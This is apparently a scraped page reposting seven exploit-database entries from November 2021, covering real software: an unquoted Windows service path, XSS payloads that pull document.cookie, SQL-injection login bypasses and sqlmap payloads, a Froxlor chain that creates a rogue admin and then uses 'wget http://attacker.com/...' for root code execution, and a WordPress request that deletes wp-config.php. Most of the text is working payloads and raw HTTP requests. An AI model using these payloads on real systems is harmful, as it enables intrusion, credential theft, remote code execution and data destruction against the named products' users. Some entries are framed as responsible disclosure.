ISHACK AI BOT

# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path # Discovery by: Brian Rodriguez # Date: 04-11-2021 # Vendor Homepage: https://www.10-strike.com/ # Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe # Tested Version: 9.31 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Enterprise 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ srvInventoryWebServer srvInventoryWebServer C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe Auto C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: srvInventoryWebServer TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : srvInventoryWebServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS) # Date: 2021-11-05 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://www.criticalgears.com/ # Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) https://www.criticalgears.com/product/stripe-payment-terminal/ ) # Version: 2.4.1, 2.2.1 & 3.1 # Tested on: Linux (Apache) Document Title: =============== Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2280 Release Date: ============= 2021-11-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2280 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Quick and easy payment terminal as script for clients to pay for products and services. (Copy of the Homepage:https://www.criticalgears.com/product/authorize-net-payment-terminal/ ) (Copy of the Homepage:https://www.criticalgears.com/product/paypal-pro-payment-terminal/ ) (Copy of the Homepage:https://www.criticalgears.com/product/stripe-payment-terminal/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1. The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1. The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1. Affected Product(s): ==================== CriticalGears Product: Authorize.net Payment Terminal 2.4.1 - Payment Formular Script (PHP) (Web-Application) Product: Stripe Payment Terminal v2.2.1 - Payment Formular Script (PHP) (Web-Application) Product: PayPal PRO Payment Terminal v3.1 - Payment Formular Script (PHP) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-08-22: Researcher Notification & Coordination (Security Researcher) 2021-08-23: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-11-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple non-persistent cross site scripting web vulnerabilities has been discovered in the official Authorize.net Payment Terminal v2.4.1, the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site browser to web-application requests. The non-persistent cross site scripting web vulnerabilities are located in the `item_description`,`fname`,`lname`,`address`,`city`,`email` parameters of the `Billing Information` or `Payment Information` formular. Attackers are able to inject own malicious script code to the `Description`,`Firstname`, `Lastname`,`Address`,`City`,`Email` input fields to manipulate client-side requests. The request method to inject is post and the attack vector is non-persistent on client-side. In case the form is implemented to another web-service attackers are able to exploit the bug by triggering an execute of the script code in the invalid exception-handling. The PayPal PRO Payment Terminal v3.1 and Stripe Payment Terminal v2.2.1 impacts the same vulnerable script and is affected as well by the simple validation vulnerability. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Billing Information [+] Payment Information Vulnerable Input(s): [+] Description [+] Firstname [+] Lastname [+] Address [+] City [+] Email Vulnerable Parameter(s): [+] item_description [+] fname [+] lname [+] address [+] city [+] email Affected Module(s): [+] Exception Handling (Invalid) Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue. Exploitation: Payload ">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe> ">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe> Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack) <div id="accordion"> <!-- PAYMENT BLOCK --> <h2 class="current">Payment Information</h2> <div class="pane" style="display:block"> <label>Description:</label> <input name="item_description" id="item_description" type="text" class="long-field" value=""> <iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" <div class="clr"></div> <label>Amount:</label> <input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);"> <div class="clr"></div> </div> <!-- PAYMENT BLOCK --> - <!-- BILLING BLOCK --> <h2>Billing Information</h2> <div class="pane"> <label>First Name:</label> <input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>Last Name:</label> <input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>Address:</label> <input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> <label>City:</label> <input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" /> <div class="clr"></div> --- PoC Session Logs (POST) --- https://autherminal.localhost:8080/authorize-terminal/ Host: autherminal.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125 Content-Length: 3270 Origin:https://autherminal.localhost:8080 Connection: keep-alive Referer:https://autherminal.localhost:8080/authorize-terminal/ Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe> &city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411 &email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123 &g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF &submit.x=50&submit.y=14&process=yes - POST: HTTP/3.0 200 OK content-type: text/html; charset=utf-8 vary: Accept-Encoding Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure restriction of the input in combination with a parse or escape of the content. After that the onkeyup checkFieldBack should be sanitized correctly to prevent script code executions for clients. Security Risk: ============== The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection # Date: 2021-11-05 # Exploit Author: Vulnerability Lab # Vendor Homepage: https://github.com/thundernest/import-export-tools-ng # Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ # Version: 10.0.4 # Tested on: Windows Document Title: =============== ImportExportTools NG 10.0.4 - HTML Injection Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2308 Release Date: ============= 2021-11-05 Vulnerability Laboratory ID (VL-ID): ==================================== 2308 Common Vulnerability Scoring System: ==================================== 4.2 Vulnerability Class: ==================== Script Code Injection Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Adds tools to import/export messages and folders (NextGen). (Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 for mozilla thunderbird. Affected Product(s): ==================== Christopher Leidigh Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird) Vulnerability Disclosure Timeline: ================================== 2021-10-07: Researcher Notification & Coordination (Security Researcher) 2021-10-08: Vendor Notification (Security Department) 2021-**-**: Vendor Response/Feedback (Security Department) 2021-**-**: Vendor Fix/Patch (Service Developer Team) 2021-**-**: Security Acknowledgements (Security Department) 2021-11-05: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre Auth (No Privileges or Session) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A html inject web vulnerability has been discovered in the official ImportExportTools NG 10.0.4 for mozilla thunderbird. The vulnerability allows a remote attacker to inject html payloads to compromise application data or session credentials. The vulnerability is located in the html export function. Subject content on export is not sanitized like on exports in mozilla itself. Thus allows a remote attacker to send malicious emails with malformed a html payloads that executes on preview after a html export by the victim user. Vulnerable Module(s): [+] Export (HTML) Proof of Concept (PoC): ======================= The web vulnerability can be exploited by remote attackers without user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install mozilla thunderbird 2. Install ImportExportTools NG v10.0.4 3. Use another email to write to the target inbox were the export takes place Note: Inject into the subject any html test payload 4. Target user exports his content of the inbox in html were the payload executes 5. Successful reproduce of the encode validation vulnerability! Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved. Vulnerable Source: ImportExportTools Exported HTML File <html><head> <style> table { border-collapse: collapse; } th { background-color: #e6ffff; } th, td { padding: 4px; text-align: left; vertical-align: center; } tr:nth-child(even) { background-color: #f0f0f0; } tr:nth-child(odd) { background-color: #fff; } tr>:nth-child(5) { text-align: center; } </style> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Posteingang</title> </head> <body> <h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th> <th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr> <tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html"> payload in subject "><iframe src="evil.source" onlo<="" a=""></td> <td>[email protected]" <test@vulnerability-</td> <td>[email protected]</td> <td nowrap>10/07/2021</td> <td align="center">* </td></tr> Reference(s): https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/ Solution - Fix & Patch: ======================= The output that is visible in the subject needs to be encoded and secure sanitized to prevent an execute from any listed value. Restrict the execution via import/export with special chars to prevent further attacks. Credits & Authors: ================== Vulnerability-Lab [[email protected]] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass) # Exploit Author: Sentinal920 # Date: 5-11-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: Login # Vulnerable Parameter: "password" Technical description: An SQL Injection vulnerability exists in the Simple Client Management System. An attacker can leverage the vulnerable "password" parameter in the "Login.php" web page to authenticate as an admin user. Steps to exploit: 1) Navigate to http://localhost/cms/admin/login.php 2) Set username as admin and insert your payload in the password parameter Proof of concept (Poc): The following payload inside password will allow you to login into the web server as admin admin'or'1'%3D'1 --- POST /cms/classes/Login.php?f=login HTTP/1.1 Host: localhost Content-Length: 51 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close username=admin'or'1'%3D'1&password=admin'or'1'%3D'1 ---

# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Sentinal920 # Date: 5-11-2021 # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: client,invoice # Vulnerable Parameters: "lastname", "remarks" Technical description: A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/cms/admin/?page=client 2) Click on add new client 3) Insert your payload in the "lastname" parameter or the "description" parameter 4) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - <script>alert(1)</script> 1) XSS POC in Add New Client ----------------------------- POST /cms/classes/Master.php?f=save_client HTTP/1.1 Host: localhost Content-Length: 1026 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=client/manage_client Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="lastname" <script>alert(1)</script> ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="firstname" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="middlename" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="dob" 2021-11-03 ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="contact" xxxxxxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="address" xxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- 2) XSS POC in Add New Invoice ----------------------------- POST /cms/classes/Master.php?f=save_invoice HTTP/1.1 Host: localhost Content-Length: 1032 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=invoice/manage_invoice Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="id" ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="client_id" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="service_id[]" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="price[]" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="total_amount" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="remarks" <script>alert(1)</script> ------WebKitFormBoundaryEk0iOWhhoA0lApXo--

# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated) # Google Dork: intitle: "Inicio de Sesión - Kmaleon" # Date: 2021-11-05 # Exploit Author: Amel BOUZIANE-LEBLOND # Vendor Homepage: https://www.levelprograms.com # Software Link: https://www.levelprograms.com/kmaleon-abogados/ # Version: v1.1.0.205 # Tested on: Linux # Description: # The Kmaleon application from levelprogram is vulnerable to # SQL injection via the 'tipocomb' parameter on the kmaleonW.php ==================== 1. SQLi ==================== http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true The 'tipocomb' parameter is vulnerable to SQL injection. GET parameter 'tipocomb' is vulnerable. --- Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.0

# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass # Date: 2021-11-07 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html # Version: 1.0 # Tested on: Windows 10 # Admin panel authentication bypass Admin panel authentication can be bypassed due to a SQL injection in the login form: Request: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/mtms/admin/login.php Content-Length: 37 Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3 Connection: keep-alive username='=''or'&password='=''or' PoC: curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php

# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated) # Exploit Author: Martin Cernac # Date: 2021-11-05 # Vendor: Froxlor (https://froxlor.org/) # Software Link: https://froxlor.org/download.php # Affected Version: 0.10.28, 0.10.29, 0.10.29.1 # Patched Version: 0.10.30 # Category: Web Application # Tested on: Ubuntu # CVE: 2021-42325 # 1. Technical Description: # # Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine. # # 1.1 Pre-requisites # - Access to a customer account # - Ability to specify database name when creating a database # - Feature only availible from 0.10.28 onward and must be manually enabled # 2. Proof Of Concept (PoC): # # The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root # # 2.1 Privilege Escalation # # - Sign into Froxlor as a customer # - View your databases # - Create a database # - Put your payload into the "User/Database name" field (if enabled) # - Application will error out however your SQL query will be executed # # The following is a POST request example of running the payload provided, resulting in an administrator account being created --- POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 448 s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0 --- # # 2.2 Remote Code Execution # # To achieve RCE as root: # # - Sign into Froxlor as the newly created admin account (payload example creds are x:a) # - Go to System Settings # - Go to Webserver settings # - Adjust "Webserver reload command" field to a custom command # - The command must not contain any of the following special characters: ;|&><`$~? # - For details, see "safe_exec" function in lib/Froxlor/FileDir.php # - For example commands see Payloads 4.2 section # - Trigger configuration file rebuild # - Use menu item "Rebuild config files" # - Await a root cron job to execute your command # 3. Vulnerable resources and parameters # /customer_mysql.php (POST field: custom_suffix) # 4. Payloads # # 4.1 SQL Injection payload # The following payload creates a new Froxlor admin with full access to all customers and the server configuration # The credentials are: # - username: x # - password: a # # `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);-- # # # 4.2 Remote Code Execution payload # Two part payload: # - wget http://attacker.com/malicious.txt -O /runme.php # - php /runme.php # 5. Timeline # 2021-10-11 Discovery # 2021-10-11 Contact with developer # 2021-10-11 Patch issued but no release rolled out # 2021-10-12 Reserved CVE-2021-42325 # 2021-11-05 Fix release rolled out # 2021-11-07 Public disclosure # 6. References: # https://github.com/Froxlor/Froxlor/releases/tag/0.10.30

# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion # Date: 11/07/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/ # Version: 1.0.3 # Tested on : Windows 10 #Poc: ----------------------------------REQUEST--------------------------------------- POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 155 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce ---------------------------------------------------------------------------------- -------------------------------RESPONSE------------------------------------------- HTTP/1.1 200 OK Date: Sun, 07 Nov 2021 13:19:38 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 X-Powered-By: PHP/8.0.7 Access-Control-Allow-Origin: http://localhost Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 9 Connection: close Content-Type: application/json; charset=UTF-8 "success" ----------------------------------------------------------------------------------

